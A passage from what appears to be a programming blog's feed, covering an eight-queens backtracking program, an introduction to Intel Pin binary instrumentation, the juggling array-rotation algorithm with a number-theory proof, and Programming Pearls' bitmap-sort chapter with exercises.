{
for (int i = 0; i < N; ++i)
{
for (int j = 0; j < solution[i]; ++j)
{
cout << 0 << " ";
}
cout << 1 << " ";
for (int j = solution[i] + 1; j < N; ++j)
{
cout << 0 << " ";
}
cout << endl;
}
cout << "\n\n\n";
}
void Queen(int x)
{
if(x == 8)
{
print_solution();
count++;
return;
}
for (int i = 0; i < N; ++i)
{
int d1 = (x+i) % 15;
int d2 = (x-i+15) % 15;
if (!my[i] && !md1[d1] && !md2[d2])
{
my[i] = md1[d1] = md2[d2] = true;
solution[x] = i;
Queen(x+1);
my[i] = md1[d1] = md2[d2] = false;
}
}
}
int main()
{
Queen(0);
cout << count << endl;
}
</code></pre></div></div>
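<p>The row-by-row pruned search can be sketched in Python using sets for the occupied columns and diagonals (a hypothetical equivalent of the C++ above; row+col and row-col identify the two diagonals directly, without the mod-15 trick):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def count_queens(n=8):
    """Count the n-queens solutions by backtracking row by row."""
    cols, d1, d2 = set(), set(), set()    # occupied columns and diagonals
    count = 0
    def place(row):
        nonlocal count
        if row == n:                      # all rows filled: one solution
            count += 1
            return
        for col in range(n):
            if col in cols or row + col in d1 or row - col in d2:
                continue                  # square is attacked: prune
            cols.add(col); d1.add(row + col); d2.add(row - col)
            place(row + 1)
            cols.discard(col); d1.discard(row + col); d2.discard(row - col)
    place(0)
    return count

print(count_queens(8))                    # 92
</code></pre></div></div>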
An introduction to Intel Pin2014-01-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/02/intro-to-pin
<h3>1. Intel Pin in brief</h3>
<p>Pin is a dynamic binary instrumentation framework from Intel for building dynamic program-analysis tools. It supports the IA-32 and x86-64 instruction sets on both Windows and Linux.</p>
<p>In short, Pin can observe every step of a program's execution and offers a rich API for injecting functions into a running binary — for example, counting how many instructions a program executes and recording each instruction's address. With that level of control a lot becomes possible: memory-usage checking, performance evaluation, and so on. I first ran into Pin in articles about taint analysis, and I plan to write a series of posts about it.</p>
<h3>2. Building the PinTools</h3>
<p>This section briefly covers building the PinTools on Windows.</p>
<p>1. From the <a href="http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool">Pin site</a>, pick the Pin kit matching your Visual Studio version</p>
<p>2. Install <a href="http://www.cygwin.com/">Cygwin</a>, remembering to select the make tool</p>
<p>3. After installing Cygwin, add its bin directory to the Path environment variable</p>
<p>4. From a VS command prompt, cd into pin/source/tools/ManualExamples and run make to build the examples there; you can also build all the PinTools from the tools directory. On Windows the outputs are generally DLLs.</p>
<h3>3. A usage example</h3>
<p>Run this from cmd (test.exe is a trivial hello-world of my own; itrace.dll is the DLL built in step 2 under manualExamples/obj-ia32):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pin -t itrace.dll -- test.exe
</code></pre></div></div>
<p>This produces an itrace.out file in the directory, recording the address of each executed instruction. Comparing against the disassembly in OllyDbg shows that Pin does not start recording from the first instruction of the binary image but from the process's instructions (apparently not even the very first one), i.e. starting from the thread start routine inside ntdll.</p>
<h3>4. Pin in depth</h3>
<p>This part is translated from the <a href="http://software.intel.com/sites/landingpage/pintool/docs/62141/Pin/html/index.html#INSTRUMENTING">Pin documentation</a>; there are surely mistakes, and corrections are welcome.</p>
<h4>Pin</h4>
<p>The best way to think about Pin is as a JIT compiler whose input is not bytecode but a regular executable. Pin intercepts the first instruction of the executable, generates a new code sequence, and transfers control to it. The generated sequence is almost identical to the original, but Pin ensures it regains control when a branch exits the sequence. After regaining control, Pin generates code for the branch target and runs it. Pin keeps all generated code in memory so it can be reused, and lets control jump directly from one sequence to another, which improves efficiency.</p>
<p>In JIT mode, the only code ever executed is the generated code; the original code is used only for reference. When generating code, Pin gives the user the opportunity to inject their own code (instrumentation).</p>
<p>Pin's injected instrumentation code is actually executed, wherever it is placed. Broadly there are some exceptions around conditional branches — for example, an instruction that never executes will never have its instrumentation run.</p>
<h4>Pintools</h4>
<p>Conceptually, instrumentation has two components:</p>
<ul>
<li>a mechanism that decides where to insert code and what code to insert</li>
<li>the code to execute at those insertion points</li>
</ul>
<p>These are called the <strong>instrumentation</strong> and <strong>analysis</strong>
code. Both components live in a single executable, the <strong>Pintool</strong>. Pintools can be thought of as plugins for Pin that modify its code-generation process.</p>
<p>A Pintool registers instrumentation callbacks with Pin, which are invoked whenever Pin generates new code. These callbacks are the instrumentation component: they inspect the code about to be generated, examine its static properties, and decide whether and where to insert calls to analysis functions.</p>
<p>Analysis functions gather data about the program. Pin ensures that the integer and floating-point register state is saved and restored as needed, and allows arguments to be passed to these functions.</p>
<p>A Pintool can also register notification callbacks for events such as thread creation and fork; these are typically used for data collection or for setup and teardown.</p>
<h4>Observations</h4>
<p>Because a Pintool works like a plugin, it must live in the same address space as Pin and the instrumented executable. It can therefore access all of the executable's data, and it shares file descriptors and other process state with it.</p>
<p>Pin and the Pintool control the program from its very first instruction. For executables linked against shared libraries, this means the dynamic loader and the shared libraries are visible to the Pintool as well.</p>
<p>When writing tools, it is far more important to tune the analysis code than the instrumentation code: instrumentation code runs once, while analysis code runs many times.</p>
<h4>Instrumentation Granularity</h4>
<p>As described above, Pin instruments just in time, right before a code sequence executes. We call this mode trace instrumentation.</p>
<p>Trace instrumentation lets the Pintool inspect and instrument an executable one trace at a time. A trace usually begins at the target of a taken branch and ends with an unconditional branch, including calls and returns. Pin guarantees that a trace has a single entry at the top but possibly multiple exits. If a branch occurs inside a trace, Pin constructs a new trace starting at the branch target. Pin divides a trace into basic blocks (BBLs): instruction sequences with a single entry and a single exit. A branch into the middle of a BBL starts a new trace and thus a new BBL. It is usually more efficient to insert one analysis call per basic block rather than per instruction, since reducing the number of analysis calls speeds up instrumentation. Trace instrumentation uses the TRACE_AddInstrumentFunction API call.</p>
<p>Note that because Pin discovers the control flow dynamically as the program executes, its notion of a BBL differs from the classical compiler-textbook definition. For example, consider the code generated for the following switch statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>switch(i)
{
case 4: total++;
case 3: total++;
case 2: total++;
case 1: total++;
case 0:
default: break;
}
</code></pre></div></div>
<p>It produces the following instructions (on IA-32):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.L7:
addl $1, -4(%ebp)
.L6:
addl $1, -4(%ebp)
.L5:
addl $1, -4(%ebp)
.L4:
addl $1, -4(%ebp)
</code></pre></div></div>
<p>With classical basic blocks, each addl instruction would be a single-instruction block. Pin instead generates, for the different switch cases, a 4-instruction BBL (entering at .L7), a 3-instruction BBL (entering at .L6), and so on. So Pin's BBL count can differ from the textbook definition: here, when control branches to .L7, Pin sees 1 BBL while four classical basic blocks execute.</p>
<p>Pin also breaks certain instructions — such as cpuid, popf, and rep-prefixed instructions — into their own BBLs. Because a rep prefix is treated as an implicit loop, a rep-prefixed instruction that iterates more than once generates a single-instruction BBL after the first iteration, so this situation can produce more basic blocks than you might expect.</p>
<p>For convenience, Pin also offers an instruction instrumentation mode (instruction instrumentation) that lets a tool inspect and instrument a single instruction at a time. It is essentially identical to trace instrumentation, but the tool writer does not need to iterate over the instructions of a trace. As with trace instrumentation, a given basic block or instruction may be generated — and thus instrumented — many times. Instruction instrumentation uses the INS_AddInstrumentFunction API call.</p>
<p>Sometimes a coarser granularity than a trace is more useful. Pin provides two such modes: image and routine instrumentation. They are implemented by caching instrumentation requests, which costs extra memory; they are also called ahead-of-time instrumentation.</p>
<p>Image instrumentation lets a Pintool inspect and instrument an entire image (IMG) when it is first loaded. The tool can walk each section (SEC) of the image, each routine (RTN) in a section, and each instruction (INS) in a routine. Instrumentation can be inserted so that it executes before or after a routine or an instruction. Image instrumentation uses the IMG_AddInstrumentFunction API call and relies on symbol information to determine routine boundaries, so PIN_InitSymbols must be called before PIN_Init.</p>
<p>Routine instrumentation lets a Pintool inspect and instrument an entire routine the first time it is called in a thread. The tool can walk each instruction of the routine; there is not enough information here to group instructions into basic blocks. Instrumentation can be inserted so that it executes before or after a routine or an instruction. Routine instrumentation is a convenient alternative when the tool writer does not need to iterate over sections during image instrumentation.</p>
<p>Routine instrumentation uses the RTN_AddInstrumentFunction API call. Instrumentation after a routine cannot be relied upon, because when the routine ends in a tail call it is impossible to tell when it returns.</p>
<p>Note that with image and routine instrumentation it is impossible to know whether an (analysis) routine will ever be executed, since this instrumentation happens when the image is loaded. With trace and instruction instrumentation, only code that actually executes is visited.</p>
<h4>Managed platforms support</h4>
<p>Pin supports all executables, including managed binaries. From Pin's point of view, a managed binary is a self-modifying program. There is a way for Pin to distinguish just-in-time compiled (jitted) code from all other dynamically generated code, and to associate jitted code with the appropriate managed routine. To support this, the JIT compiler of the managed platform must support the Jit Profiling API.</p>
<p>The following features are supported:</p>
<ul>
<li>The RTN_IsDynamic() API identifies dynamically generated routines. A routine must be reported as dynamically generated through the Jit Profiling API.</li>
<li>A Pin tool can instrument jitted routines using the RTN_AddInstrumentFunction API</li>
</ul>
<p>To enable managed platform support, the following conditions must be met:</p>
<ul>
<li>
<p>Set the INTEL_JIT_PROFILER32 and INTEL_JIT_PROFILER64 environment variables so that the pinjitprofiling dynamic library is picked up</p>
<ol>
<li>
<p>For Windows</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> set INTEL_JIT_PROFILER32=<The Pin kit full path>\ia32\bin\pinjitprofiling.dll
set INTEL_JIT_PROFILER64=<The Pin kit full path>\intel64\bin\pinjitprofiling.dll
</code></pre></div> </div>
</li>
<li>
<p>For Linux</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> setenv INTEL_JIT_PROFILER32 <The Pin kit full path>/ia32/bin/libpinjitprofiling.so
setenv INTEL_JIT_PROFILER64 <The Pin kit full path>/intel64/bin/libpinjitprofiling.so
</code></pre></div> </div>
</li>
</ol>
</li>
<li>
<p>Add the knob support_jit_api option for the Pin tool on the Pin command line</p>
</li>
</ul>
<h4>Symbols</h4>
<p>Pin provides access to function names through symbol objects (SYM). Symbol objects describe only the function symbols in a program; other symbol types (such as data symbols) must be obtained independently by the tool.</p>
<p>On Windows this can be done with dbghelp.dll. Note that using dbghelp.dll inside instrumentation routines is not safe and can cause deadlocks. One possible workaround is to obtain the symbols from a separate, uninstrumented process.</p>
<p>On Linux, libelf.so or libdwarf.so can be used to obtain symbol information.</p>
<p>PIN_InitSymbols must be called before functions can be looked up by name.</p>
<h4>Floating Point Support in Analysis Routines</h4>
<p>Pin preserves the program's floating-point state while executing analysis routines.</p>
<p>IARG_REG_VALUE cannot be used to pass floating-point register values to analysis routines.</p>
<h4>Instrumenting Multi-threaded Applications</h4>
<p>When instrumenting multi-threaded programs, the tool must be thread-safe wherever cooperating threads access global data. Pin tries to provide the environment of a traditional C++ program, but a Pintool cannot use the standard threading libraries: Linux tools cannot use pthreads and Windows tools cannot use the Win32 thread-management APIs. Instead, use the locking and thread-management APIs that Pin provides.</p>
<p>Pintools do not need explicit locking when inserting instrumentation, because Pin calls instrumentation routines while holding an internal lock, the VM lock. However, Pin executes analysis and replacement routines in parallel, so a Pintool may need to lock global data accessed from those routines.</p>
<p>Pintools on Linux must be careful when calling C/C++ standard library functions from analysis or replacement routines, because the C/C++ libraries linked into Pintools are not thread-safe. Some simple C/C++ functions are inherently thread-safe and need no locking, but Pin does not provide a list of them; when in doubt, take a lock around library calls. In particular, the errno variable is not multithread-safe, so a tool that uses it must provide its own locking. Note that these restrictions exist only on Unix; the library functions are thread-safe on Windows.</p>
<p>Pin can insert callbacks at thread start and end, which give a Pintool a convenient place to allocate and manage thread-local data.</p>
<p>Pin also provides an analysis-routine argument (IARG_THREAD_ID) that passes a Pin-specific thread ID for the calling thread. This ID differs from the OS thread ID; it is a small number starting at 0 and can be used as an index into arrays of thread data or user locks.</p>
<p>Besides the Pin thread ID, the Pin API offers efficient thread-local storage (TLS), with the option of allocating a new TLS key and associating a cleanup function with its data. Each thread in the process can store and retrieve the value of its own slot for a given key. The initial value associated with a key is NULL in all threads.</p>
<p>False sharing occurs when multiple threads access different parts of the same cache line and at least one of them writes. To keep memory coherent, the machine must copy one CPU's cache line to another even though no data is actually shared. False sharing can be avoided by aligning critical data on cache-line boundaries or by rearranging data structures.</p>
<h4>Avoiding Deadlocks in Multi-threaded Applications</h4>
<p>Because Pin, the tool, and the application may all acquire and release locks, the Pin tool developer must take care to avoid deadlock. Deadlock typically happens when two threads acquire the same locks in different orders: for example, thread A takes lock L1 then L2, while thread B takes L2 then L1. If A holds L1 while waiting for L2, and B holds L2 while waiting for L1, the result is deadlock. To prevent this, Pin imposes a hierarchy on lock acquisition: Pin acquires its own internal locks before acquiring any subsequent lock, and the application is assumed to acquire its locks at the top of the hierarchy. The figure below shows the ordering:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Application locks -> Pin internal locks -> Tool locks
</code></pre></div></div>
<p>Pin tool developers should not break this lock hierarchy when designing their own locks. The basic guidelines are:</p>
<ul>
<li>
<p>If the tool acquires any lock in a Pin callback, it must release it before returning from that callback. Holding a lock across a Pin callback violates the hierarchy with respect to Pin's internal locks.</p>
</li>
<li>If the tool acquires any lock in an analysis routine, it must release it before returning from that routine. Holding a lock across an analysis routine violates the hierarchy with respect to both Pin's internal locks and the application's own locks.</li>
<li>If the tool calls a Pin API from a Pin callback or an analysis routine, it should not hold any lock while calling that API. Some Pin APIs take internal Pin locks, so holding a tool lock across such a call violates the hierarchy.</li>
<li>If the tool calls a Pin API from an analysis routine, it may need to acquire the Pin client lock via PIN_LockClient(); this depends on the API, so see the documentation of the specific call. Note that the tool must not hold any of the other locks described above when calling PIN_LockClient().</li>
</ul>
<p>Although the guidelines above suffice in most cases, they may be overly strict in certain situations. The following guidelines describe relaxations of the basic rules:</p>
<ul>
<li>
<p>In JIT mode, the tool may acquire locks in an analysis routine without releasing them until just before leaving the trace that contains the routine. The tool must expect the trace to exit early if the application throws an exception. Any lock L the tool still holds when the application throws an exception must obey these rules:</p>
<ul>
<li>The tool must register a callback for application exceptions that releases any previously acquired lock L. This callback can be registered with PIN_AddContextChangeFunction().</li>
<li>To avoid breaking the hierarchy, the tool must not acquire the lock in any Pin callback.</li>
</ul>
</li>
<li>
<p>If the tool calls a Pin API from an analysis routine, it may acquire and hold a lock L across the call provided that the following hold at the time of the call:</p>
<ul>
<li>Lock L is never acquired from any Pin callback. This avoids violating the hierarchy.</li>
<li>The Pin API being called does not cause application code to execute. This avoids violating the hierarchy.</li>
</ul>
</li>
</ul>
The juggling algorithm and its proof2013-12-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2013/12/22/zashua
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<p>This is a problem from Programming Pearls, and a staple of written interviews. The statement is simple: rotate an n-element one-dimensional vector left by i positions; for example with n=8 and i=3, abcdefgh becomes defghabc. Straightforward code uses an n-element intermediate vector and finishes in n steps. Can you rotate the vector in time proportional to n using only a few bytes of extra storage?</p>
<p>Here is the simplest solution.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <iostream>
 #include <cstdio>   // printf
 #include <cstring>  // strlen
 using namespace std;
void reverse(char *a,int beg, int end)
{
char tmp;
for (; beg < end; beg++, end-- )
{
tmp = a[beg];
a[beg] = a[end];
a[end] = tmp;
}
}
void LeftReverse(char *a,int n, int k)
{
reverse(a,0,k - 1);
reverse(a,k,n - 1 );
reverse(a,0,n - 1);
}
int main()
{
char test[] = "123abcdefg" ;
LeftReverse(test,strlen(test),3);
printf( "reversed:%s",test);
return 0;
}
</code></pre></div></div>
<p>Of course, today's topic is not that solution but another one the book mentions — I forget the English name; the Chinese translation renders it as the "juggling algorithm". The steps: move x[0] to the temporary t, then move x[i] to x[0], x[2i] to x[i], and so on, until we come back to taking an element from x[0], at which point we instead take the element from t and stop the process.
If that process didn't move all the elements, then we start over at x[1], and continue until we move all the elements. The code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <iostream>
 #include <cstdio>   // printf
 using namespace std;
int gcd(int a,int b)
{
int c;
if (a < b)
{
c = a;
a = b;
b = c;
}
while(b)
{
if(a % b == 0)
return b;
else
{
c = a % b;
a = b;
b = c;
}
}
return a;  // reached only when b == 0 initially
}
void rotate(char * a,int n, int k)
{
char tmp;
int j;
for (int i = 0; i < gcd(n,k); ++i)
{
tmp = a[i];
for (j = i + k; j!= i; j = (j + k) % n)
{
a[(j-k+n) % n] = a[j];
}
j = (j - k + n ) % n;
a[j] = tmp;
}
}
int main()
{
char a[] = "abc12345678" ;
cout << "gcd(11,3):" << gcd(11,3) << endl;
rotate(a,11,3);
printf ( "after rotate:%s\n",a);
return 0;
}
</code></pre></div></div>
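<p>The same cycle-following idea can be sketched compactly in Python (a hypothetical rendering of the C++ above, using the standard-library gcd):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from math import gcd

def rotate_left(a, k):
    """Rotate list a left by k positions in place, via gcd(n, k) cycles."""
    n = len(a)
    if n == 0:
        return a
    k %= n
    for start in range(gcd(n, k)):
        tmp = a[start]                 # save the cycle's first element
        j = start
        while True:
            nxt = (j + k) % n          # element that moves into slot j
            if nxt == start:
                break
            a[j] = a[nxt]
            j = nxt
        a[j] = tmp                     # close the cycle
    return a

print(''.join(rotate_left(list("abcdefgh"), 3)))   # defghabc
</code></pre></div></div>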
<p>After the steps shown in the figure below, the shift is complete; in this example i=3, n=11.</p>
<p><img src="/assets/img/zacou/zacou.jpg" alt="" /></p>
<p>The algorithm stops after \(gcd(i,n)\) passes — why? That is where number theory comes in, which is today's topic.</p>
<p>Number theory gives the following result: the \(n\) numbers</p>
\[0\,mod\,n,\quad i\,mod\,n,\quad 2i\,mod\,n,\quad \cdots,\quad (n-1)i\,mod\,n\quad (1)\]
<p>form, in some order, exactly \(d\) copies of the \(\frac{n}{d}\) numbers</p>
\[0,\quad d,\quad 2d,\quad \cdots,\quad n-d\quad \quad (2)\]
<p>where \(d=gcd(i,n)\). For example, with \(n=12\) and \(i=8\) we have \(d=4\), and the numbers are \(0,8,4,0,8,4,0,8,4,0,8,4\).</p>
<p>The first part of the proof (that we obtain \(d\) copies of the first \(\frac{n}{d}\) values) is straightforward: by the basic theory of congruences,</p>
\[ji\equiv ki(mod\,n)\Leftrightarrow j\frac{i}{d}\equiv k\frac{i}{d}(mod\,\frac{n}{d})\]
<p>so for \(0\leqslant k< \frac{n}{d}\) we obtain \(d\) copies of these \(\frac{n}{d}\) numbers, with \(k\) ranging over the least complete nonnegative residue system modulo \(\frac{n}{d}\).</p>
<p>Now we show that these \(\frac{n}{d}\) numbers are exactly \({0,d,2d,\cdots,n-d}\) (in some order). Write \(i={i}'d,n={n}'d\). By the distributive law of mod, \(c(x\,mod\,y)=(cx)\,mod\,(cy)\), we have</p>
\[ki\,mod\,n=d(k{i}'\,mod\,{n}')\]
<p>so the values that appear for \(0\leqslant k< {n}'\) are \(d\) times the numbers</p>
\[0\,mod\,{n}',\quad {i}'\,mod\,{n}',\quad {2{i}'}\,mod\,{n}',({n}'-1){i}'\,mod\,{n}'\]
<p>We know \(({i}',{n}')=1\), so it suffices to prove the case \(d=1\), i.e. the case where \(i\) and \(n\) are coprime.</p>
<p>Assume now \((i,n)=1\). The numbers in (1) are pairwise distinct: otherwise take \(k,j\in [0,n-1],k\neq j\) with \(ki=ji\); then \(ki\equiv ji(mod\,n)\), and since \((i,n)=1\) we get \(k\equiv j(mod\,n)\), hence \(k=j\), a contradiction. So the numbers in (1) are exactly \(0,1,2,\cdots,n-1\).</p>
<p>That completes the proof; now back to the example. Here \(n=11,i=3,gcd(11,3)=1\), so the values of</p>
\[0,3\,mod\,11,6\,mod\,11,\cdots,10*3\,mod\,11\]
<p>are exactly the least nonnegative complete residue system modulo \(11\), in some order. So after the steps</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>t = x[0]
x[0] = x[i mod n]
x[i mod n] = x[2i mod n]
……
x[(n-2)*i mod n] = x[(n-1)*i mod n]
x[(n-1)*i mod n] = t
</code></pre></div></div>
<p>every element has reached its destination.</p>
<p>What if \((n,i)=d(d\neq 1)\)? From the result above, after every \({n}'=\frac{n}{d}\) steps the sequence restarts from some element of \(0,d,2d,\cdots,{n}'-d\), and we run into \(x[0]\) again. At that point we move \(x[1]\) into \(t\) and repeat the steps above; the figure illustrates it.</p>
<p><img src="/assets/img/zacou/12.jpg" alt="" /></p>
<p>The picture makes it clear.</p>
<p>I ran into this result while reviewing number theory, and it reminded me of this old problem; now it is completely clear to me. They say mathematics is the queen of science and number theory the queen of mathematics — number theory is full of charming results. The world is full of such beauty, and I hope to share it with you.</p>
Programming Pearls, Chapter 12013-12-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2013/12/04/programming-pearls
<p>Problem: a file contains at most n (n = 10,000,000) positive integers, each less than n, with no duplicates. How can we sort them quickly using at most 1 MB of memory?</p>
<p>Approach 1: merge sort, with time complexity n lg n. But merge sort needs all the data in memory at once, which clearly takes about 10,000,000*4/(1024*1024) ≈ 40 MB — far too much space.</p>
<p>Approach 2: split the integers into 40 ranges — [0–249999], [250000–499999], …, [9750000–9999999] — and scan the input 40 times, extracting the first range on the first pass, the second on the next pass, and so on. Each pass handles 250,000 numbers, which satisfies the memory limit, but it takes too long, especially since I/O is so expensive.</p>
<p>Approach 3: the subject of this chapter — bitmap sort. The idea is to use 1 bit to record whether each number in [0, n) is present: set the bit to 1 if it is, 0 otherwise. One final scan then emits the numbers in sorted order. The space used is roughly n/(8*1024*1024) MB; for 10,000,000 that is about 1.25 MB. For example, the set {1,2,3,5,8,13}, all below 20, is represented with 20 bits as 01110100100001000000, and a single scan recovers the sorted order. In pseudocode:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for i = [0,n)
bit[i] = 0
for each i in the input file
bit[i] = 1
for i = [0,n)
if bit[i] == 1
write i on the output file
</code></pre></div></div>
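<p>The pseudocode above can be sketched directly in Python with a bytearray as the bitmap (a hypothetical illustration, not the book's code):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def bitmap_sort(nums, n):
    """Sort distinct integers in [0, n) using one bit per possible value."""
    bits = bytearray((n + 7) // 8)          # all bits start at 0
    for x in nums:
        bits[x &gt;&gt; 3] |= 1 &lt;&lt; (x &amp; 7)        # set bit x
    return [i for i in range(n)             # scan bits in order
            if bits[i &gt;&gt; 3] &amp; (1 &lt;&lt; (i &amp; 7))]

print(bitmap_sort([13, 5, 1, 8, 2, 3], 20))  # [1, 2, 3, 5, 8, 13]
</code></pre></div></div>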
<p>The actual code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* bitsort.c -- bitmap sort from Column 1
* Sort distinct integers in the range [0..N-1]
*/
#include <stdio.h>
#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];
void set(int i) { a[i>>SHIFT] |= (1<<(i & MASK)); }
void clr(int i) { a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int test(int i){ return a[i>>SHIFT] & (1<<(i & MASK)); }
int main()
{
int i;
for (i = 0; i < N; i++)
clr(i);
/* Replace above 2 lines with below 3 for word-parallel init
int top = 1 + N/BITSPERWORD;
for (i = 0; i < top; i++)
a[i] = 0;
*/
while (scanf("%d", &i) != EOF)
set(i);
for (i = 0; i < N; i++)
if (test(i))
printf("%d\n", i);
return 0;
}
</code></pre></div></div>
<p>The code needs little comment, except to note that the bit-manipulation helpers are rather elegant. Clearly, bitmap sort has some preconditions:</p>
<p>1. The input numbers must lie in a known range</p>
<p>2. The input should have no duplicates; if each value repeats at most m times, use lg m bits per value</p>
<p><strong>Exercises:</strong></p>
<p>1. Sorting with library routines</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C语言
/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* qsortints.c -- Sort input set of integers using qsort */
#include <stdio.h>
#include <stdlib.h>
int intcomp(int *x, int *y)
{
return *x - *y;
}
int a[1000000];
int main()
{
int i, n=0;
while (scanf("%d", &a[n]) != EOF)
n++;
qsort(a, n, sizeof(int), intcomp);
for (i = 0; i < n; i++)
printf("%d\n", a[i]);
return 0;
}
C++ version:
/* Copyright (C) 1999 Lucent Technologies *//* From 'Programming Pearls' by Jon Bentley */
/* sortints.cpp -- Sort input set of integers using STL set */
#include <iostream>
#include <set>
using namespace std;
int main()
{
set<int> S;
int i;
set<int>::iterator j;
while (cin >> i)
S.insert(i);
for (j = S.begin(); j != S.end(); ++j)
cout << *j << "\n";
return 0;
}
</code></pre></div></div>
<p>2. Bit operations</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];
void set(int i) { a[i>>SHIFT] |= (1<<(i & MASK)); }
void clr(int i) { a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int test(int i){ return a[i>>SHIFT] & (1<<(i & MASK)); }
</code></pre></div></div>
<p>3. Bitmap sort vs. system sorts: bitmap sort is fastest, and qsort beats STL sort</p>
<p>4. Generating distinct random numbers in [0, n)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* bitsortgen.c -- gen $1 distinct integers from U[0,$2) */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define MAXN 2000000
int x[MAXN];
int randint(int a, int b)
{
return a + (RAND_MAX * rand() + rand()) % (b + 1 - a);
}
int main(int argc, char *argv[])
{
int i, k, n, t, p;
srand((unsigned) time(NULL));
k = atoi(argv[1]);
n = atoi(argv[2]);
for (i = 0; i < n; i++)
x[i] = i;
for (i = 0; i < k; i++) {
p = randint(i, n-1);
t = x[p]; x[p] = x[i]; x[i] = t;
printf("%d\n", x[i]);
}
return 0;
}
</code></pre></div></div>
<p>5. The first implementation needs 1.25 MB; if 1 MB is a strict limit, read the input in two passes — first the numbers in 0 to 4999999, then those in 5000000 to 10000000 — so each pass needs a bitmap of only about 0.625 MB. Here is an implementation from July's blog:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <ctime>
#include <bitset>
using namespace std;
const int max_each_scan = 5000000;
int main()
{
clock_t begin = clock();
bitset<max_each_scan + 1> bitmap;
bitmap.reset();
FILE* fp_unsorted_file = fopen("data.txt","r");
int num;
while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
{
if (num < max_each_scan)
{
bitmap.set(num,1);
}
}
FILE* fp_sort_file = fopen("sort.txt","w");
for (int i = 0; i < max_each_scan; ++i)
{
if (bitmap[i] == 1)
{
fprintf(fp_sort_file,"%d ",i);
}
}
int result = fseek(fp_unsorted_file,0,SEEK_SET);
if (result)
{
printf("fseek failed\n");
}
else
{
bitmap.reset();
while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
{
if (num >= max_each_scan && num < 10000000)
{
num -= max_each_scan;
bitmap.set(num,1);
}
}
for (int i = 0; i < max_each_scan; ++i)
{
if (bitmap[i] == 1)
{
fprintf(fp_sort_file, "%d ",i + max_each_scan );
}
}
}
clock_t end = clock();
cout << "bitmap sort elapsed: " << (end - begin) / CLOCKS_PER_SEC << "s" << endl;
return 0;
}
</code></pre></div></div>
<p>6. If each value can appear up to 10 times, 4 bits are needed to count each value. Depending on available memory, use a single pass or multiple passes.</p>
<p>7. Validate the program's input: no value should appear more than once, be less than 0, or exceed n.</p>
<p>8. If toll-free prefixes include 800, 878, 888, and so on, how do you test whether a number is toll-free? The only method I can think of follows this chapter's idea: with n prefixes it costs about 1.25 MB * n of memory.</p>
<p>9. Avoiding initialization. I only understood the answer after searching online. The trick is to declare two arrays, from and to, plus a variable top = 0;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if(from[i] < top && to[from[i]] == i)
{
printf("has used!\n")
}
else
{
a[i] = 1;
from[i] = top;
to[top] = i;
top++;
}
</code></pre></div></div>
<p>The variable top records how many elements have been initialized so far. from[i] = top records that a[i] was the top-th element to be initialized, and to[top] = i records that the top-th initialized element has index i in data. So each access to element i first checks from[i] &lt; top, i.e. whether data[i] has been initialized. But when top is large, the garbage value the memory happened to leave in from[i] might really be less than top, which is why we also need the check to[from[i]] == i: it guarantees that from[i] &lt; top holds because of a real initialization, not because of a random leftover value. This one takes some thought to internalize.</p>
<p>10. Hash customers into groups by the last two digits of their phone number.</p>
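<p>The from/to trick can be sketched as a small Python class (hypothetical names; zero-filled lists stand in for the uninitialized memory that the paired check makes safe to read):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>class LazyArray:
    """Set membership over [0, n) with no per-element initialization."""
    def __init__(self, n):
        self.frm = [0] * n          # stand-in for uninitialized memory
        self.to = [0] * n           # stand-in for uninitialized memory
        self.top = 0                # number of slots initialized so far
    def contains(self, i):
        # garbage in frm[i] fails one of the two checks
        return self.frm[i] &lt; self.top and self.to[self.frm[i]] == i
    def add(self, i):
        if not self.contains(i):
            self.frm[i] = self.top  # i is the top-th initialized slot
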